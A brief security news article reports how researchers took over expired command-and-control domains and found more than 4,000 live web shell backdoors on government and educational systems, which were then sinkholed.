Thousands of Live Backdoors Exposed as Hackers’ Command Domains Expire

Thousands of Live Backdoors Exposed as Hackers' Command Domains Expire

Web Shell Backdoor Takeover Exposes Thousands of Compromised Systems

Security researchers at WatchTowr Labs, in collaboration with The Shadowserver Foundation, have successfully intercepted over 4,000 active web backdoors by acquiring expired command-and-control domains. This operation revealed numerous compromised high-profile systems, including government and educational institutions.

The investigation uncovered various types of web shells, including:
– r57shell (basic backdoor)
– c99shell (advanced capabilities with file management)
– China Chopper (associated with APT groups)

Notable compromised systems included:
– Chinese government infrastructure and courts
– Nigerian government judicial system
– Bangladesh government network
– Educational institutions in Thailand, China, and South Korea

The research team identified these vulnerable systems by registering over 40 expired domains previously used to control the backdoors. Upon registration, they implemented logging systems that captured communication attempts from compromised servers trying to “phone home.”

To prevent malicious actors from exploiting these backdoors, The Shadowserver Foundation has assumed control of the domains and established a sinkhole for all traffic from affected systems. This intervention has effectively prevented potential cybercriminals from gaining unauthorized access to these compromised systems.

The findings highlight a significant security risk: expired malware control domains can be easily acquired by threat actors, potentially giving them immediate access to previously compromised systems that remain unpatched.

Share This Article